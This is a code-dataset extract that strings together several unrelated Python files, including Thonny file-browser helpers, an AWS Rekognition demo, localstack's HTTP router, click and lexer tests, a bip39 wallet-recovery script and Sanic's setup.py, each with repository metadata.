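# Editor's hedged sketch of how the two helpers above are meant to be combined when
# spawning a backend process (the Popen call is illustrative):
#
#     env = os.environ.copy()
#     update_system_path(env, get_augmented_system_path(get_exe_dirs()))
#     # subprocess.Popen([sys.executable, "-m", "some_backend"], env=env)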
class UserError(RuntimeError):
"""Errors of this class are meant to be presented without stacktrace"""
pass
def is_hidden_or_system_file(path: str) -> bool:
if os.path.basename(path).startswith("."):
return True
elif platform.system() == "Windows":
from ctypes import windll
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
return bool(
windll.kernel32.GetFileAttributesW(path) # @UndefinedVariable
& (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM)
)
else:
return False
def get_dirs_child_data(paths):
"""Used for populating local file browser's tree view.
dir_paths contains full paths of the open directories.
Returns information required for refreshing this view"""
res = {}
for path in paths:
# assuming the path already has actual case
res[path] = get_single_dir_child_data(path)
return res
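# Editor's hedged illustration: the front-end calls this with the directories that
# are currently expanded in the file browser, e.g.
#
#     get_dirs_child_data(["C:\\Users\\me", "C:\\Users\\me\\Documents"])
#     # -> {"C:\\Users\\me": {"Documents": {"size": None, "time": ...}, ...}, ...}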
def get_single_dir_child_data(path):
if path == "":
if platform.system() == "Windows":
return {**get_windows_volumes_info(), **get_windows_network_locations()}
else:
return get_single_dir_child_data("/")
elif os.path.isdir(path) or os.path.ismount(path):
result = {}
try:
for child in os.listdir(path):
full_child_path = normpath_with_actual_case(os.path.join(path, child))
if not is_hidden_or_system_file(full_child_path):
st = os.stat(full_child_path, dir_fd=None, follow_symlinks=True)
name = os.path.basename(full_child_path)
result[name] = {
"size": None if os.path.isdir(full_child_path) else st.st_size,
"time": max(st.st_mtime, st.st_ctime),
}
except PermissionError:
result["<not accessible>"] = {"kind": "error", "size": -1, "time": None}
return result
elif os.path.isfile(path):
return "file"
else:
return "missing"
def get_windows_volumes_info():
# http://stackoverflow.com/a/2288225/261181
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa364939%28v=vs.85%29.aspx
import string
from ctypes import windll
all_drive_types = [
"DRIVE_UNKNOWN",
"DRIVE_NO_ROOT_DIR",
"DRIVE_REMOVABLE",
"DRIVE_FIXED",
"DRIVE_REMOTE",
"DRIVE_CDROM",
"DRIVE_RAMDISK",
]
required_drive_types = [
"DRIVE_REMOVABLE",
"DRIVE_FIXED",
"DRIVE_REMOTE",
"DRIVE_RAMDISK",
]
result = {}
bitmask = windll.kernel32.GetLogicalDrives() # @UndefinedVariable
for letter in string.ascii_uppercase:
drive_type = all_drive_types[
windll.kernel32.GetDriveTypeW("%s:\\" % letter)
] # @UndefinedVariable
if bitmask & 1 and drive_type in required_drive_types:
drive = letter + ":"
path = drive + "\\"
volume_name = get_windows_volume_name(path)
if not volume_name:
volume_name = "Local Disk"
label = volume_name + " (" + drive + ")"
try:
st = os.stat(path)
result[path] = {
"label": label,
"size": None,
"time": max(st.st_mtime, st.st_ctime),
}
except PermissionError:
# probably an empty cardreader slot
pass
bitmask >>= 1
return result
def get_windows_volume_name(path):
# https://stackoverflow.com/a/12056414/261181
import ctypes
kernel32 = ctypes.windll.kernel32
volume_name_buffer = ctypes.create_unicode_buffer(1024)
file_system_name_buffer = ctypes.create_unicode_buffer(1024)
serial_number = None
max_component_length = None
file_system_flags = None
result = kernel32.GetVolumeInformationW(
ctypes.c_wchar_p(path),
volume_name_buffer,
ctypes.sizeof(volume_name_buffer),
serial_number,
max_component_length,
file_system_flags,
file_system_name_buffer,
ctypes.sizeof(file_system_name_buffer),
)
if result:
return volume_name_buffer.value
else:
return None
def get_windows_network_locations():
import ctypes.wintypes
CSIDL_NETHOOD = 0x13
SHGFP_TYPE_CURRENT = 0
buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
ctypes.windll.shell32.SHGetFolderPathW(0, CSIDL_NETHOOD, 0, SHGFP_TYPE_CURRENT, buf)
shortcuts_dir = buf.value
result = {}
for entry in os.scandir(shortcuts_dir):
# full_path = normpath_with_actual_case(entry.path)
lnk_path = os.path.join(entry.path, "target.lnk")
if os.path.exists(lnk_path):
try:
target = get_windows_lnk_target(lnk_path)
result[target] = {
"label": entry.name + " (" + target + ")",
"size": None,
"time": None,
}
except:
logging.getLogger("thonny").error(
"Can't get target from %s", lnk_path, exc_info=True
)
return result
def get_windows_lnk_target(lnk_file_path):
import thonny
script_path = os.path.join(
os.path.dirname(thonny.__file__), "res", "PrintLnkTarget.vbs"
)
cmd = ["cscript", "/NoLogo", script_path, lnk_file_path]
result = subprocess.check_output(cmd, universal_newlines=True, timeout=3)
return result.strip()
| 28.278195
| 88
| 0.607684
|
f100599cd575f33e481555c826a169d0be5ca67a
| 3,317
|
py
|
Python
|
custom_humus.py
|
ziniman/aws-rekognition-demo
|
5cee9a47531e80c42525dfc134cf89bd40313cc1
|
[
"Apache-2.0"
] | 11
|
2018-08-14T17:57:36.000Z
|
2021-03-06T14:54:28.000Z
|
custom_humus.py
|
ziniman/aws-rekognition-demo
|
5cee9a47531e80c42525dfc134cf89bd40313cc1
|
[
"Apache-2.0"
] | null | null | null |
custom_humus.py
|
ziniman/aws-rekognition-demo
|
5cee9a47531e80c42525dfc134cf89bd40313cc1
|
[
"Apache-2.0"
] | 5
|
2018-06-07T20:08:12.000Z
|
2021-02-24T09:56:50.000Z
|
#!/usr/bin/python
#Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#SPDX-License-Identifier: MIT-0 (For details, see https://github.com/awsdocs/amazon-rekognition-developer-guide/blob/master/LICENSE-SAMPLECODE.)
import boto3
import io
from PIL import Image, ImageDraw, ExifTags, ImageColor, ImageFont
region = 'us-east-1'
def show_custom_labels(model,bucket,photo, min_confidence):
client=boto3.client('rekognition', region_name=region)
# Load image from S3 bucket
s3_connection = boto3.resource('s3')
s3_object = s3_connection.Object(bucket,photo)
s3_response = s3_object.get()
stream = io.BytesIO(s3_response['Body'].read())
image=Image.open(stream)
#Call DetectCustomLabels
response = client.detect_custom_labels(Image={'S3Object': {'Bucket': bucket, 'Name': photo}},
MinConfidence=min_confidence,
ProjectVersionArn=model)
imgWidth, imgHeight = image.size
draw = ImageDraw.Draw(image)
# calculate and display bounding boxes for each detected custom label
print('Detected custom labels for ' + photo)
max_w = 0
c = 0
largest = 0
for customLabel in response['CustomLabels']:
print('Label ' + str(customLabel['Name']))
print('Confidence ' + str(customLabel['Confidence']))
if customLabel['Name'] == 'Humus' and 'Geometry' in customLabel:
box = customLabel['Geometry']['BoundingBox']
width = imgWidth * box['Width']
if width>max_w:
largest = c
max_w = width
c += 1
print(largest)
customLabel = response['CustomLabels'][largest]
print('Label ' + str(customLabel['Name']))
print('Confidence ' + str(customLabel['Confidence']))
if customLabel['Name'] == 'Humus' and 'Geometry' in customLabel:
box = customLabel['Geometry']['BoundingBox']
left = imgWidth * box['Left']
top = imgHeight * box['Top']
width = imgWidth * box['Width']
height = imgHeight * box['Height']
fnt = ImageFont.truetype('/Library/Fonts/Arial.ttf', 30)
if customLabel['Name'] == 'Humus':
color = '#00cc00'
else:
color = '#d40000'
draw.text((left+10,top+10), customLabel['Name'] + ' - ' + str(customLabel['Confidence']) + '%', fill=color, font=fnt)
print('Left: ' + '{0:.0f}'.format(left))
print('Top: ' + '{0:.0f}'.format(top))
print('Face Width: ' + "{0:.0f}".format(width))
print('Face Height: ' + "{0:.0f}".format(height))
points = (
(left,top),
(left + width, top),
(left + width, top + height),
(left , top + height),
(left, top))
draw.line(points, fill=color, width=3)
image.show()
return len(response['CustomLabels'])
def main():
bucket="sagemaker-humus"
photo="Humus/libat.jpg"
model='arn:aws:rekognition:us-east-1:397652707012:project/Real_Humus/version/Real_Humus.2019-12-24T15.41.28/1577194888945'
min_confidence=50
label_count=show_custom_labels(model,bucket,photo, min_confidence)
print("Custom labels detected: " + str(label_count))
if __name__ == "__main__":
main()
| 30.431193
| 143
| 0.617124
|
4076477ef9e73ca8a602e67ed2b9875d30928b6f
| 2,348
|
py
|
Python
|
PreprocessData/all_class_files/TelevisionStation.py
|
wkid-neu/Schema
|
4854720a15894dd814691a55e03329ecbbb6f558
|
[
"MIT"
] | 3
|
2021-11-06T12:29:05.000Z
|
2022-03-22T12:48:55.000Z
|
PreprocessData/all_class_files/TelevisionStation.py
|
DylanNEU/Schema
|
4854720a15894dd814691a55e03329ecbbb6f558
|
[
"MIT"
] | null | null | null |
PreprocessData/all_class_files/TelevisionStation.py
|
DylanNEU/Schema
|
4854720a15894dd814691a55e03329ecbbb6f558
|
[
"MIT"
] | 1
|
2021-11-06T12:29:12.000Z
|
2021-11-06T12:29:12.000Z
|
from PreprocessData.all_class_files.LocalBusiness import LocalBusiness
import global_data
class TelevisionStation(LocalBusiness):
def __init__(self, additionalType=None, alternateName=None, description=None, disambiguatingDescription=None, identifier=None, image=None, mainEntityOfPage=None, name=None, potentialAction=None, sameAs=None, url=None, address=None, aggregateRating=None, alumni=None, areaServed=None, award=None, brand=None, contactPoint=None, department=None, dissolutionDate=None, duns=None, email=None, employee=None, event=None, faxNumber=None, founder=None, foundingDate=None, foundingLocation=None, funder=None, globalLocationNumber=None, hasOfferCatalog=None, hasPOS=None, isicV4=None, legalName=None, leiCode=None, location=None, logo=None, makesOffer=None, member=None, memberOf=None, naics=None, numberOfEmployees=None, owns=None, parentOrganization=None, publishingPrinciples=None, review=None, seeks=None, sponsor=None, subOrganization=None, taxID=None, telephone=None, vatID=None, additionalProperty=None, amenityFeature=None, branchCode=None, containedInPlace=None, containsPlace=None, geo=None, hasMap=None, isAccessibleForFree=None, maximumAttendeeCapacity=None, openingHoursSpecification=None, photo=None, publicAccess=None, smokingAllowed=None, specialOpeningHoursSpecification=None, currenciesAccepted=None, openingHours=None, paymentAccepted=None, priceRange=None):
LocalBusiness.__init__(self, additionalType, alternateName, description, disambiguatingDescription, identifier, image, mainEntityOfPage, name, potentialAction, sameAs, url, address, aggregateRating, alumni, areaServed, award, brand, contactPoint, department, dissolutionDate, duns, email, employee, event, faxNumber, founder, foundingDate, foundingLocation, funder, globalLocationNumber, hasOfferCatalog, hasPOS, isicV4, legalName, leiCode, location, logo, makesOffer, member, memberOf, naics, numberOfEmployees, owns, parentOrganization, publishingPrinciples, review, seeks, sponsor, subOrganization, taxID, telephone, vatID, additionalProperty, amenityFeature, branchCode, containedInPlace, containsPlace, geo, hasMap, isAccessibleForFree, maximumAttendeeCapacity, openingHoursSpecification, photo, publicAccess, smokingAllowed, specialOpeningHoursSpecification, currenciesAccepted, openingHours, paymentAccepted, priceRange)
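# Editor's hedged illustration: every constructor argument defaults to None, so a
# minimal instance only needs the fields of interest, e.g.
#
#     station = TelevisionStation(name="WXYZ", url="https://example.org",
#                                 telephone="+1-555-0100")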
| 293.5
| 1,273
| 0.832624
|
428fbea6bcc5942bbf0d4bc9763ab30177e6aa37
| 8,997
|
py
|
Python
|
localstack/http/router.py
|
TheRakeshPurohit/localstack
|
063e07827934a7c7ff00e6d7cf6e243bcce0eb99
|
[
"Apache-2.0"
] | null | null | null |
localstack/http/router.py
|
TheRakeshPurohit/localstack
|
063e07827934a7c7ff00e6d7cf6e243bcce0eb99
|
[
"Apache-2.0"
] | null | null | null |
localstack/http/router.py
|
TheRakeshPurohit/localstack
|
063e07827934a7c7ff00e6d7cf6e243bcce0eb99
|
[
"Apache-2.0"
] | null | null | null |
import functools
import inspect
import threading
from typing import (
Any,
Callable,
Dict,
Generic,
Iterable,
List,
Mapping,
NamedTuple,
Optional,
Protocol,
Type,
TypeVar,
)
from werkzeug.routing import BaseConverter, Map, Rule, RuleFactory
from localstack.utils.common import to_str
from .request import Request
from .response import Response
E = TypeVar("E")
RequestArguments = Mapping[str, Any]
class Dispatcher(Protocol[E]):
"""
A Dispatcher is called when a URL route matches a request. The dispatcher is responsible for appropriately
creating a Response from the incoming Request and the matching endpoint.
"""
def __call__(self, request: Request, endpoint: E, args: RequestArguments) -> Response:
"""
Dispatch the HTTP Request.
:param request: the incoming HTTP request
:param endpoint: the endpoint that matched the URL rule
:param args: the request arguments extracted from the URL rule
:return: an HTTP Response
"""
pass
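# Editor's hedged example of a custom Dispatcher (not part of localstack): treat the
# endpoint as a plain string and echo the matched rule arguments back.
#
#     def echo_dispatcher(request: Request, endpoint: str, args: RequestArguments) -> Response:
#         return Response("endpoint=%s args=%s" % (endpoint, dict(args)))
#
#     router = Router(dispatcher=echo_dispatcher)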
class _RuleAttributes(NamedTuple):
path: str
    host: Optional[str] = None
methods: Optional[Iterable[str]] = None
kwargs: Optional[Dict[str, Any]] = {}
class _RouteEndpoint(Protocol):
"""
An endpoint that encapsulates ``_RuleAttributes`` for the creation of a ``Rule`` inside a ``Router``.
"""
rule_attributes: _RuleAttributes
def __call__(self, *args, **kwargs):
raise NotImplementedError
def route(
path: str, host: Optional[str] = None, methods: Optional[Iterable[str]] = None, **kwargs
) -> Callable[[E], _RouteEndpoint]:
"""
Decorator that indicates that the given function is a Router Rule.
:param path: the path pattern to match
    :param host: an optional host matching pattern. if no pattern is given, the rule matches any host
:param methods: the allowed HTTP verbs for this rule
:param kwargs: any other argument that can be passed to ``werkzeug.routing.Rule``
:return: the function endpoint wrapped as a ``_RouteEndpoint``
"""
def wrapper(fn: E):
@functools.wraps(fn)
def route_marker(*args, **kwargs):
return fn(*args, **kwargs)
route_marker.rule_attributes = _RuleAttributes(path, host, methods, kwargs)
return route_marker
return wrapper
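# Editor's hedged usage sketch: the decorator only attaches _RuleAttributes to the
# function; a Router instance still has to register it, e.g.
#
#     @route("/health", methods=["GET"])
#     def health(request: Request, args) -> Response:
#         return Response("ok")
#
#     router.add_route_endpoint(health)   # or router.add_route_endpoints(some_obj)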
def call_endpoint(
request: Request,
endpoint: Callable[[Request, RequestArguments], Response],
args: RequestArguments,
) -> Response:
"""
A Dispatcher that treats the matching endpoint as a callable and invokes it with the Request and request arguments.
"""
return endpoint(request, args)
def _clone_map_without_rules(old: Map) -> Map:
return Map(
default_subdomain=old.default_subdomain,
charset=old.charset,
strict_slashes=old.strict_slashes,
merge_slashes=old.merge_slashes,
redirect_defaults=old.redirect_defaults,
converters=old.converters,
sort_parameters=old.sort_parameters,
sort_key=old.sort_key,
encoding_errors=old.encoding_errors,
host_matching=old.host_matching,
)
class Router(Generic[E]):
"""
A Router is a wrapper around werkzeug's routing Map, that adds convenience methods and additional dispatching
logic via the ``Dispatcher`` Protocol.
"""
url_map: Map
dispatcher: Dispatcher[E]
def __init__(
self, dispatcher: Dispatcher[E] = None, converters: Mapping[str, Type[BaseConverter]] = None
):
self.url_map = Map(
host_matching=True, strict_slashes=False, converters=converters, redirect_defaults=False
)
self.dispatcher = dispatcher or call_endpoint
self._mutex = threading.RLock()
def add(
self,
path: str,
endpoint: E,
host: Optional[str] = None,
methods: Optional[Iterable[str]] = None,
**kwargs,
) -> Rule:
"""
Adds a new Rule to the URL Map.
:param path: the path pattern to match
:param endpoint: the endpoint to invoke
        :param host: an optional host matching pattern. if no pattern is given, the rule matches any host
:param methods: the allowed HTTP verbs for this rule
:param kwargs: any other argument that can be passed to ``werkzeug.routing.Rule``
:return:
"""
if host is None and self.url_map.host_matching:
# this creates a "match any" rule, and will put the value of the host
# into the variable "__host__"
host = "<__host__>"
# the typing for endpoint is a str, but the doc states it can be any value,
# however then the redirection URL building will not work
rule = Rule(path, endpoint=endpoint, methods=methods, host=host, **kwargs)
self.add_rule(rule)
return rule
def add_route_endpoint(self, fn: _RouteEndpoint) -> Rule:
"""
Adds a RouteEndpoint (typically a function decorated with ``@route``) as a rule to the router.
:param fn: the RouteEndpoint function
:return: the rule that was added
"""
attr: _RuleAttributes = fn.rule_attributes
        return self.add(path=attr.path, endpoint=fn, host=attr.host, methods=attr.methods, **attr.kwargs)
def add_route_endpoints(self, obj: object) -> List[Rule]:
"""
Scans the given object for members that can be used as a `RouteEndpoint` and adds them to the router.
:param obj: the object to scan
:return: the rules that were added
"""
rules = []
members = inspect.getmembers(obj)
for _, member in members:
if hasattr(member, "rule_attributes"):
rules.append(self.add_route_endpoint(member))
return rules
def add_rule(self, rule: RuleFactory):
with self._mutex:
self.url_map.add(rule)
def remove_rule(self, rule: Rule):
"""
Removes a Rule from the Router.
**Caveat**: This is an expensive operation. Removing rules from a URL Map is intentionally not supported by
werkzeug due to issues with thread safety, see https://github.com/pallets/werkzeug/issues/796, and because
using a lock in ``match`` would be too expensive. However, some services that use Routers for routing
internal resources need to be able to remove rules when those resources are removed. So to remove rules we
create a new Map without that rule. This will not prevent the rules from dispatching until the Map has been
completely constructed.
:param rule: the Rule to remove that was previously returned by ``add``.
"""
with self._mutex:
old = self.url_map
if rule not in old._rules:
raise KeyError("no such rule")
new = _clone_map_without_rules(old)
for r in old.iter_rules():
if r == rule:
# this works even with copied rules because of the __eq__ implementation of Rule
continue
new.add(r.empty())
self.url_map = new
def dispatch(self, request: Request) -> Response:
"""
Does the entire dispatching roundtrip, from matching the request to endpoints, and then invoking the endpoint
using the configured dispatcher of the router. For more information on the matching behavior,
see ``werkzeug.routing.MapAdapter.match()``.
:param request: the HTTP request
:return: the HTTP response
"""
matcher = self.url_map.bind(server_name=request.host)
handler, args = matcher.match(
request.path, method=request.method, query_args=to_str(request.query_string)
)
args.pop("__host__", None)
return self.dispatcher(request, handler, args)
def route(
self,
path: str,
host: Optional[str] = None,
methods: Optional[Iterable[str]] = None,
**kwargs,
) -> Callable[[E], _RouteEndpoint]:
"""
Returns a ``route`` decorator and immediately adds it to the router instance. This effectively mimics flask's
``@app.route``.
:param path: the path pattern to match
        :param host: an optional host matching pattern. if no pattern is given, the rule matches any host
:param methods: the allowed HTTP verbs for this rule
:param kwargs: any other argument that can be passed to ``werkzeug.routing.Rule``
:return: the function endpoint wrapped as a ``_RouteEndpoint``
"""
def wrapper(fn):
r = route(path, host, methods, **kwargs)
fn = r(fn)
self.add_route_endpoint(fn)
return fn
return wrapper
class RegexConverter(BaseConverter):
def __init__(self, map: "Map", *args: Any, **kwargs: Any) -> None:
super().__init__(map, *args, **kwargs)
self.regex = args[0]
| 33.696629
| 119
| 0.642214
|
f4ad5d40a98c476cc27350aa4c7bf886ff5dfcd4
| 1,122
|
py
|
Python
|
sol/test_lexer.py
|
ianpreston/sol
|
469fff7f7aff8469e7a2731fbf4b06de0db78836
|
[
"MIT"
] | null | null | null |
sol/test_lexer.py
|
ianpreston/sol
|
469fff7f7aff8469e7a2731fbf4b06de0db78836
|
[
"MIT"
] | null | null | null |
sol/test_lexer.py
|
ianpreston/sol
|
469fff7f7aff8469e7a2731fbf4b06de0db78836
|
[
"MIT"
] | null | null | null |
from sol.lexer import Lexer, Token, TokenType
def test_assignment():
source = 'x := Object.clone'
lexer = Lexer(source)
tokens = lexer.iter_match_tokens()
tokens = list(tokens)
assert tokens == [
Token(TokenType.IDENT, 'x'),
Token(TokenType.OPER, ':='),
Token(TokenType.IDENT, 'Object'),
Token(TokenType.DOT, '.'),
Token(TokenType.IDENT, 'clone'),
Token(TokenType.EOF, 'EOF'),
]
def test_string():
source = 'x := "Hello world"'
lexer = Lexer(source)
tokens = lexer.iter_match_tokens()
tokens = list(tokens)
assert tokens == [
Token(TokenType.IDENT, 'x'),
Token(TokenType.OPER, ':='),
Token(TokenType.STRING, 'Hello world'),
Token(TokenType.EOF, 'EOF'),
]
def test_multiple_idents():
source = 'a bar quux'
lexer = Lexer(source)
tokens = lexer.iter_match_tokens()
tokens = list(tokens)
assert tokens == [
Token(TokenType.IDENT, 'a'),
Token(TokenType.IDENT, 'bar'),
Token(TokenType.IDENT, 'quux'),
Token(TokenType.EOF, 'EOF'),
]
| 22.897959
| 47
| 0.582888
|
bd4135af844412519a6f855555c6e21968751b6a
| 4,202
|
py
|
Python
|
tests/test_prompt.py
|
nobody-65534/click-constrained-option
|
db9d3cbcf551b888cf4f38717d864a9c1e4568a9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_prompt.py
|
nobody-65534/click-constrained-option
|
db9d3cbcf551b888cf4f38717d864a9c1e4568a9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_prompt.py
|
nobody-65534/click-constrained-option
|
db9d3cbcf551b888cf4f38717d864a9c1e4568a9
|
[
"BSD-3-Clause"
] | null | null | null |
import re
import unittest
import click
from click.testing import CliRunner
from click_constrained_option import ConstrainedOption
class TestPrompt(unittest.TestCase):
def test_prompt_func(self):
@click.command()
@click.option("--a")
@click.option("--b", cls=ConstrainedOption, prompt_func=lambda a: a == '0')
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0"], input="1\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': '1'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if(self):
@click.command()
@click.option("--a")
@click.option("--b", cls=ConstrainedOption, prompt_if="a")
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0"], input="1\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': '1'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_not(self):
@click.command()
@click.option("--a")
@click.option("--b", cls=ConstrainedOption, prompt_if_not="a")
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, [], input="0\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': None, 'b': '0'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_all_of(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c", cls=ConstrainedOption, prompt_if_all_of=["a", "b"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0", "--b=1"], input="3\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': '1', 'c': '3'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_none_of(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c", cls=ConstrainedOption, prompt_if_none_of=["a", "b"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, [], input="0\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': None, 'b': None, 'c': '0'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_any_of(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c", cls=ConstrainedOption, prompt_if_any_of=["a", "b"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0"], input="1\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': None, 'c': '1'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_one_of(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c", cls=ConstrainedOption, prompt_if_one_of=["a", "b"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0"], input="1\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': None, 'c': '1'}, eval(re.findall(r".+", result.output)[-1]))
def test_composition(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c")
@click.option("--d")
@click.option("--e", cls=ConstrainedOption, prompt_if="a", prompt_if_not="b", prompt_if_one_of=["c", "d"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0", "--c=1"], input="2\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': None, 'c': '1', 'd': None, 'e': '2'}, eval(re.findall(r".+", result.output)[-1]))
if __name__ == '__main__':
unittest.main()
| 33.616
| 126
| 0.554736
|
7034cbd365315f9239fbd832974a75f4c1eaca8d
| 1,345
|
py
|
Python
|
electrum_cintamani/scripts/bip39_recovery.py
|
sgmua8/electrum-dash
|
f7e6059fb07994867af3eebd1cd0c9789a0615d3
|
[
"MIT"
] | null | null | null |
electrum_cintamani/scripts/bip39_recovery.py
|
sgmua8/electrum-dash
|
f7e6059fb07994867af3eebd1cd0c9789a0615d3
|
[
"MIT"
] | null | null | null |
electrum_cintamani/scripts/bip39_recovery.py
|
sgmua8/electrum-dash
|
f7e6059fb07994867af3eebd1cd0c9789a0615d3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
import asyncio
from electrum_cintamani.util import json_encode, print_msg, create_and_start_event_loop, log_exceptions
from electrum_cintamani.simple_config import SimpleConfig
from electrum_cintamani.network import Network
from electrum_cintamani.keystore import bip39_to_seed
from electrum_cintamani.bip32 import BIP32Node
from electrum_cintamani.bip39_recovery import account_discovery
try:
mnemonic = sys.argv[1]
passphrase = sys.argv[2] if len(sys.argv) > 2 else ""
except Exception:
print("usage: bip39_recovery <mnemonic> [<passphrase>]")
sys.exit(1)
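# Editor's hedged note on usage: invoked as in the usage string above, e.g.
#
#     python3 bip39_recovery.py "<12- or 24-word mnemonic>" "<optional passphrase>"
#
# the script prints a JSON list of the accounts discovered on-chain for that seed.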
loop, stopping_fut, loop_thread = create_and_start_event_loop()
config = SimpleConfig()
network = Network(config)
network.start()
@log_exceptions
async def f():
try:
def get_account_xpub(account_path):
root_seed = bip39_to_seed(mnemonic, passphrase)
root_node = BIP32Node.from_rootseed(root_seed, xtype="standard")
account_node = root_node.subkey_at_private_derivation(account_path)
account_xpub = account_node.to_xpub()
return account_xpub
active_accounts = await account_discovery(network, get_account_xpub)
print_msg(json_encode(active_accounts))
finally:
stopping_fut.set_result(1)
asyncio.run_coroutine_threadsafe(f(), loop)
| 32.804878
| 103
| 0.758364
|
fc19e20a5cb2dd172edd230c3f5a337eef9adf86
| 3,656
|
py
|
Python
|
setup.py
|
ddc67cd/sanic
|
150d75b7c6aa2346436f0eb895048c53976c98d4
|
[
"MIT"
] | null | null | null |
setup.py
|
ddc67cd/sanic
|
150d75b7c6aa2346436f0eb895048c53976c98d4
|
[
"MIT"
] | null | null | null |
setup.py
|
ddc67cd/sanic
|
150d75b7c6aa2346436f0eb895048c53976c98d4
|
[
"MIT"
] | null | null | null |
"""
Sanic
"""
import codecs
import os
import re
import sys
from distutils.util import strtobool
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
"""
Provide a Test runner to be used from setup.py to run unit tests
"""
user_options = [("pytest-args=", "a", "Arguments to pass to pytest")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ""
def run_tests(self):
import shlex
import pytest
errno = pytest.main(shlex.split(self.pytest_args))
sys.exit(errno)
def open_local(paths, mode="r", encoding="utf8"):
path = os.path.join(os.path.abspath(os.path.dirname(__file__)), *paths)
return codecs.open(path, mode, encoding)
with open_local(["sanic", "__version__.py"], encoding="latin1") as fp:
try:
version = re.findall(
r"^__version__ = \"([^']+)\"\r?$", fp.read(), re.M
)[0]
except IndexError:
raise RuntimeError("Unable to determine version.")
with open_local(["README.rst"]) as rm:
long_description = rm.read()
setup_kwargs = {
"name": "sanic",
"version": version,
"url": "http://github.com/huge-success/sanic/",
"license": "MIT",
"author": "Sanic Community",
"author_email": "admhpkns@gmail.com",
"description": (
"A web server and web framework that's written to go fast. Build fast. Run fast."
),
"long_description": long_description,
"packages": ["sanic"],
"package_data": {"sanic": ["py.typed"]},
"platforms": "any",
"python_requires": ">=3.6",
"classifiers": [
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
"entry_points": {"console_scripts": ["sanic = sanic.__main__:main"]},
}
env_dependency = (
'; sys_platform != "win32" ' 'and implementation_name == "cpython"'
)
ujson = "ujson>=1.35" + env_dependency
uvloop = "uvloop>=0.5.3" + env_dependency
requirements = [
"httptools>=0.0.10",
uvloop,
ujson,
"aiofiles>=0.6.0",
"websockets>=8.1,<9.0",
"multidict>=5.0,<6.0",
"httpx==0.15.4",
]
tests_require = [
"pytest==5.2.1",
"multidict>=5.0,<6.0",
"gunicorn==20.0.4",
"pytest-cov",
"httpcore==0.11.*",
"beautifulsoup4",
uvloop,
ujson,
"pytest-sanic",
"pytest-sugar",
"pytest-benchmark",
"pytest-dependency",
]
docs_require = [
"sphinx>=2.1.2",
"sphinx_rtd_theme",
"recommonmark>=0.5.0",
"docutils",
"pygments",
]
dev_require = tests_require + [
"aiofiles",
"tox",
"black",
"flake8",
"bandit",
"towncrier",
]
all_require = dev_require + docs_require
if strtobool(os.environ.get("SANIC_NO_UJSON", "no")):
print("Installing without uJSON")
requirements.remove(ujson)
tests_require.remove(ujson)
# 'nt' means windows OS
if strtobool(os.environ.get("SANIC_NO_UVLOOP", "no")):
print("Installing without uvLoop")
requirements.remove(uvloop)
tests_require.remove(uvloop)
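# Editor's hedged note: the two switches above are read from the environment at
# install time, e.g. `SANIC_NO_UJSON=yes SANIC_NO_UVLOOP=yes pip install .` builds
# Sanic without the optional C speedups.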
extras_require = {
"test": tests_require,
"dev": dev_require,
"docs": docs_require,
"all": all_require,
}
setup_kwargs["install_requires"] = requirements
setup_kwargs["tests_require"] = tests_require
setup_kwargs["extras_require"] = extras_require
setup_kwargs["cmdclass"] = {"test": PyTest}
setup(**setup_kwargs)
| 24.052632
| 89
| 0.623359
|
17801e9e466202eeec71ada65ca49688ba648bb1
| 969
|
py
|
Python
|
tanager_feeder/dialogs/new_dir_dialog.py
|
westernmarslab/tanager-feeder
|
59bc4d5deca474e2c915ea49aaba791f247de41f
|
[
"MIT"
] | null | null | null |
tanager_feeder/dialogs/new_dir_dialog.py
|
westernmarslab/tanager-feeder
|
59bc4d5deca474e2c915ea49aaba791f247de41f
|
[
"MIT"
] | null | null | null |
